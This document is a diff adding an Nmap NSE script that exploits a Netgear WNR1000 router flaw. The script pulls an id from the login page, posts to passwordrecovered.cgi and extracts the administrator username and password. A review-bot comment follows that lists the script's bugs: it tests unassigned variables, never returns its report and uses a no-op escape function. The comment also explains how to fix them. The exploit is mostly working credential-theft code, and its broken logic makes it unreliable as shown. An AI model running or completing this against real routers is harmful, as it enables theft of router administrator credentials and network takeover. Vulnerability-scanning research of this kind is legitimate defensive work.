diff --git a/scripts/http-vuln-wnr1000-creds.nse b/scripts/http-vuln-wnr1000-creds.nse
new file mode 100644
index 000000000..128ee8401
--- /dev/null
+++ b/scripts/http-vuln-wnr1000-creds.nse
@@ -0,0 +1,91 @@
+local http = require "http"
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local string = require "string"
+local vulns = require "vulns"
+
+description = [[
+A vulnerability has been discovered in WNR 1000 series that allows an attacker
+to retrieve administrator credentials with the router interface.
+Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
+
+Vulnerability discovered by c1ph04.
+]]
+
+---
+-- @usage
+-- nmap -sV --script http-vuln-wnr1000-creds -p80
+-- @output
+-- PORT STATE SERVICE REASON
+-- 80/tcp open http syn-ack
+-- | http-vuln-wnr1000-creds:
+-- | VULNERABLE:
+-- | Netgear WNR1000v3 Credential Harvesting Exploit
+-- | State: VULNERABLE (Exploitable)
+-- | IDs: None, 0-day
+-- | Description:
+-- | A vulnerability has been discovered in WNR 1000 series that allows an attacker
+-- | to retrieve administrator credentials with the router interface.
+-- | Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
+-- | Disclosure date: 26-01-2014
+-- | References:
+-- |_ http://packetstormsecurity.com/files/download/124759/netgearpasswd-disclose.zip
+--
+---
+
+author = "Paul AMAR , Rob Nicholls"
+license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
+categories = {"exploit","vuln","intrusive"}
+
+portrule = shortport.http
+
+-- function to escape specific characters
+local escape = function(str) return string.gsub(str, "", "") end
+
+action = function(host, port)
+ local uri = stdnse.get_script_args(SCRIPT_NAME..".uri") or "/"
+
+ local vuln = {
+ title = 'Netgear WNR1000v3 Credential Harvesting Exploit',
+ state = vulns.STATE.NOT_VULN, -- default
+ description = [[
+ A vulnerability has been discovered in WNR 1000 series that allows an attacker
+ to retrieve administrator credentials with the router interface.
+ Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA.
+ Vulnerability discovered by c1ph04.
+ ]],
+ references = {
+ 'http://c1ph04text.blogspot.dk/2014/01/mitrm-attacks-your-middle-or-mine.html',
+ },
+ dates = {
+ disclosure = {year = '2014', month = '01', day = '26'},
+ },
+ }
+
+ local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)
+
+ local detection_session = http.get(host, port, uri)
+
+ if detection_session then
+ -- gather the id
+ local id_netgear = string.match(escape(detection_session.body), ('(id=%d+)'))
+
+ if id_netgear == nil then
+ stdnse.print_debug(1, "%s: Unable to obtain the id", SCRIPT_NAME)
+ return
+ else
+ -- send the payload to get username and password
+ local payload_session = http.post(host, port, uri .. "passwordrecovered.cgi?" .. id_netgear, { no_cache = true }, nil, "")
+ if payload_session then
+ local netgear_username = string.match(escape(payload_session.body), 'Router Admin Username.+align="left">(.+).+Router Admin')
+ local netgear_password = string.match(escape(payload_session.body), 'Router Admin Password.+align="left">(.+).+MNUText')
+ if (username ~= nil and password ~= nil) then
+ stdnse.print_debug(1, "%s: username : " .. escape(netgear_username), SCRIPT_NAME)
+ stdnse.print_debug(1, "%s: password : " .. escape(netgear_password), SCRIPT_NAME)
+ else
+ stdnse.print_debug(1, "%s: We haven't been able to get username/password", SCRIPT_NAME)
+ end
+ end
+ end
+ end
+end
\ No newline at end of file
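Review bot: The check `if (username ~= nil and password ~= nil) then` near the end of action tests two globals that are never assigned anywhere in the file, so it is always false and the "haven't been able" branch runs even when both matches succeeded; the locals it should test are `netgear_username` and `netgear_password`. Independently of that, `vuln.state` is left at `vulns.STATE.NOT_VULN` and `vuln_report` is built but never returned, so the script reports nothing on any outcome; the success branch should set `vuln.state = vulns.STATE.EXPLOIT` and the function should end with `return vuln_report:make_output(vuln)` so the vulns framework produces the output the @output block promises. The `escape` helper is also a no-op, since `string.gsub(str, "", "")` replaces an empty pattern with an empty string and returns its input unchanged, so either drop it or give it the character list its comment describes. Finally, the @output block cites a packetstormsecurity URL while the `references` table cites a blogspot post; keep the two consistent.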